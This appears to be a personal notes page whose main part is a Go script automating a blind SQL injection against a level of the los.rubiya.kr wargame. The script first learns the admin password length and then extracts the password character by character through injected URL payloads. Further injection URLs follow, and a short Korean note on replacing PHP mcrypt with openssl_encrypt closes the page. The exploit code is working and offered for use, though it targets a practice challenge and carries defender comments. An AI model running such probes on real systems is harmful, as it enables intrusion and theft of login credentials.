https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=

 

https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=7b751aec

 

los.rubiya.kr

package main

import(
    "bytes"
    "fmt"
    "io/ioutil"
    "log"
    "net/http"
    "regexp"
    "strconv"
    "time"
)

// COOKIEVALUE is the PHPSESSID value attached to every request. It is empty in
// this listing; a live session id is a credential, so supply it at run time
// rather than committing it with the source.
const COOKIEVALUE string = ""

// State shared by main, getLength and blidSqlInjection.
var (
    // limit caps how many requests getLength issues before giving up.
    limit = 50
    // index counts requests sent so far; main resets it between the two phases.
    index = 0
    // payload collects one string per matched position.
    payload []string
    // pwLength is written by getLength on a match and stays 0 until then.
    pwLength = 0
)

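// main runs the two phases in order: getLength(50) fills pwLength, then
// blidSqlInjection(0, 0) fills payload. Each result is printed as it completes.
func main() {
    //requestPost()
    getLength(50)
    fmt.Println(strconv.Itoa(pwLength))

    // Both phases share the request counter, so it starts again from zero.
    index = 0
    blidSqlInjection(0, 0)

    // Printf rather than Println: Println does not interpret "%v" and would
    // print the directive literally in front of the slice.
    fmt.Printf("%v\n", payload)
}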

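// helloRe is the response marker matchFind looks for. In the listing the
// pattern literal was split across several lines, which Go does not allow in a
// quoted string. Only "Hello.*" survived, so any markup that once surrounded it
// cannot be recovered here. TODO: confirm against the page being matched.
var helloRe = regexp.MustCompile("Hello.*")

// matchFind reports whether targetString contains the "Hello" marker. The
// callers in this file use it as a yes/no signal on an HTTP response body.
//
// The pattern is compiled once at package scope. The listing compiled it on
// every call and discarded the error, which would have left a nil *Regexp to
// dereference had the pattern been invalid.
func matchFind(targetString string) bool {
    return helloRe.MatchString(targetString)
}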

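        // requestPost sends a fixed JSON body to the wargame's gate.php with the
        // PHPSESSID cookie attached, then prints the status, headers and body of
        // the reply. main keeps its call commented out.
        //
        // Two changes from the listing:
        //   - The req.Header.Set("Host", "httpbin.org") line is dropped. net/http
        //     takes the Host of an outgoing request from req.Host or the URL and
        //     ignores a "Host" entry in req.Header, so the line never reached the
        //     wire and only suggested a different destination.
        //   - The pre-flight print lists cookie and header names only. Printing
        //     req.Cookies() and req.Header wrote the session id to stdout, where
        //     it ends up in terminal scrollback and captured logs.
        func requestPost() {
            endpoint := "https://los.rubiya.kr/gate.php"
            jsonBody := []byte(`{"hello": "world"}`)

            req, err := http.NewRequest("POST", endpoint, bytes.NewBuffer(jsonBody))
            if err != nil {
                log.Fatal("Error reading request. ", err)
            }
            req.Header.Set("Content-Type", "application/json")

            // Attach the session cookie.
            session := http.Cookie{Name: "PHPSESSID", Value: COOKIEVALUE}
            req.AddCookie(&session)

            // Confirm what is attached without echoing any values.
            for _, c := range req.Cookies() {
                fmt.Println("cookie attached:", c.Name)
            }
            for name := range req.Header {
                fmt.Println("header attached:", name)
            }

            // A bounded timeout keeps a stalled server from hanging the program.
            client := &http.Client{Timeout: time.Second * 10}
            resp, err := client.Do(req)
            if err != nil {
                log.Fatal("Error reading response. ", err)
            }
            defer resp.Body.Close()

            fmt.Println("response Status:", resp.Status)
            fmt.Println("response Headers:", resp.Header)

            body, err := ioutil.ReadAll(resp.Body)
            if err != nil {
                log.Fatal("Error reading body. ", err)
            }
            fmt.Printf("%s\n", body)
        }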

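        // getLength sends one GET per candidate, counting down from start. It stops
        // at the first response in which matchFind sees its marker, stores that
        // candidate in pwLength and returns it. It returns -1 when start reaches 0
        // or the shared request counter index reaches limit.
        //
        // Each request URL is the fixed prefix below followed by the decimal
        // candidate and "%23%27". The outcome is read only from whether the
        // response body contains the marker.
        //
        // Defender's view: the probe can only learn something if the endpoint
        // builds its SQL from the pw parameter and answers differently for true
        // and false conditions. That is presumably the case for this wargame
        // level; bound parameters remove the first condition. On the wire it
        // appears as a run of near-identical query strings containing "length("
        // from one session, differing only in a trailing integer, so it is easy
        // to alert on in access logs.
        //
        // Changes from the listing, none of which alter the requests sent:
        //   - The recursion is now a loop, so the value found is actually returned.
        //     The listing discarded the recursive result and returned -1 unless
        //     the very first candidate matched.
        //   - Each response body is closed once read. The listing deferred the
        //     close in every recursive frame, holding bodies open until unwind.
        //   - The second `matchResult == true` test sat after a return on the same
        //     condition, so its start/2 branch was unreachable and is removed.
        func getLength(start int) int {
            const prefix = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20||%20id=%27admin%27%20%26%26%20length(pw)%3C20"

            // The JSON body and Content-Type are kept exactly as in the listing.
            jsonBody := []byte(`{"hello": "world"}`)
            session := http.Cookie{Name: "PHPSESSID", Value: COOKIEVALUE}
            client := &http.Client{Timeout: time.Second * 10}

            for candidate := start; index < limit && candidate != 0; candidate-- {
                target := prefix + strconv.Itoa(candidate) + "%23%27"
                fmt.Println("Request URL : ", target)

                req, err := http.NewRequest("GET", target, bytes.NewBuffer(jsonBody))
                if err != nil {
                    log.Fatal("Error reading request. ", err)
                }
                req.Header.Set("Content-Type", "application/json")
                req.AddCookie(&session)

                resp, err := client.Do(req)
                if err != nil {
                    log.Fatal("Error reading response. ", err)
                }
                page, err := ioutil.ReadAll(resp.Body)
                resp.Body.Close()
                if err != nil {
                    log.Fatal("Error reading body. ", err)
                }

                if matchFind(string(page)) {
                    fmt.Println("Length : ", strconv.Itoa(candidate))
                    pwLength = candidate
                    return candidate
                }
                index++
            }
            return -1
        }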

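        // blidSqlInjection walks positions pwIndex, pwIndex+1, ... and for each
        // position tries the values start, start+1, ... with one GET per value.
        // When matchFind sees its marker in a response, the value is appended to
        // payload as a one-character string and the next position starts again
        // from 0. It always returns -1; the result is the payload slice.
        //
        // It stops when pwIndex exceeds pwLength, or when start, pwIndex and
        // pwLength are all equal. There is no upper bound on start, so a position
        // for which no value matches keeps counting.
        //
        // Defender's view: as with getLength, the only signal is the presence of
        // the marker in the response, so the technique needs an endpoint that
        // places pw into its SQL text and responds differently for true and false
        // conditions (presumably so for this wargame level). It costs one request
        // per candidate value per position. Server-side that is a long,
        // single-session run of query strings containing "ascii(substr(pw," in
        // which only two integers change. Rate limits and a log rule on that
        // shape catch it early.
        //
        // Changes from the listing, none of which alter the requests sent:
        //   - string(start) on an int is written string(rune(start)). The result
        //     is the same, but the bare conversion is rejected by go vet because
        //     it reads like a decimal conversion.
        //   - The tail recursion is now a loop, and each response body is closed
        //     once read instead of in a deferred call held by every frame.
        func blidSqlInjection(start int, pwIndex int) int {
            const prefix = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20||%20id=%27admin%27%20%26%26%20ascii(substr(pw,"

            // The JSON body and Content-Type are kept exactly as in the listing.
            jsonBody := []byte(`{"hello": "world"}`)
            session := http.Cookie{Name: "PHPSESSID", Value: COOKIEVALUE}
            client := &http.Client{Timeout: time.Second * 10}

            for {
                fmt.Println(index, start, pwLength, pwIndex)
                if start == pwLength && pwLength == pwIndex {
                    return -1
                }
                if pwLength < pwIndex {
                    return -1
                }

                target := prefix + strconv.Itoa(pwIndex) + ",1))=" + strconv.Itoa(start) + "%23%27"
                fmt.Println("Request URL : ", target)

                req, err := http.NewRequest("GET", target, bytes.NewBuffer(jsonBody))
                if err != nil {
                    log.Fatal("Error reading request. ", err)
                }
                req.Header.Set("Content-Type", "application/json")
                req.AddCookie(&session)

                resp, err := client.Do(req)
                if err != nil {
                    log.Fatal("Error reading response. ", err)
                }
                page, err := ioutil.ReadAll(resp.Body)
                resp.Body.Close()
                if err != nil {
                    log.Fatal("Error reading body. ", err)
                }

                hit := matchFind(string(page))
                index++
                if hit {
                    // Store the matched code point as a one-character string.
                    payload = append(payload, string(rune(start)))
                    start, pwIndex = 0, pwIndex+1
                } else {
                    start++
                }
            }
        }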


https://los.rubiya.kr/chall/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin%27or%271&pw=fdsf


PHP가 버전 업그레이드를 함에 따라 
레거시 버전 PHP에서 사용하던 mcrypt_encrypt 관련 암호화 함수들을 쓰기 힘들게 됐다



때문에 openssl_encrypt 함수를 대신 사용해야 한다


만약 레거시 코드에서 mcrypt_encrypt 암호화 방식에서 AES 암호화로 MCRYPT_RIJNDAEL_128를  사용했다면 


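openssl_encrypt에선 AES-256-CBC로 사용하면 레거시 코드와 호환이 가능하다. 단, 이는 레거시 코드가 32바이트 키와 MCRYPT_MODE_CBC를 사용한 경우에 해당한다. MCRYPT_RIJNDAEL_128의 128은 키 길이가 아니라 블록 크기이며, AES-128/192/256 중 어느 것인지는 키 길이로 정해진다. 또한 mcrypt는 널 바이트로 패딩하고 openssl_encrypt는 기본적으로 PKCS#7 패딩을 쓰므로, 기존 암호문을 복호화하려면 패딩 처리도 맞춰야 한다.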



복호화도 동일 


php7.2부턴 mcrypt 사용이 불가능 하기 때문에 openssl_encrypt를 써야 한다 
레거시 코드를 마이그레이션 할때 만약 mcrypt를 사용했다면 참고
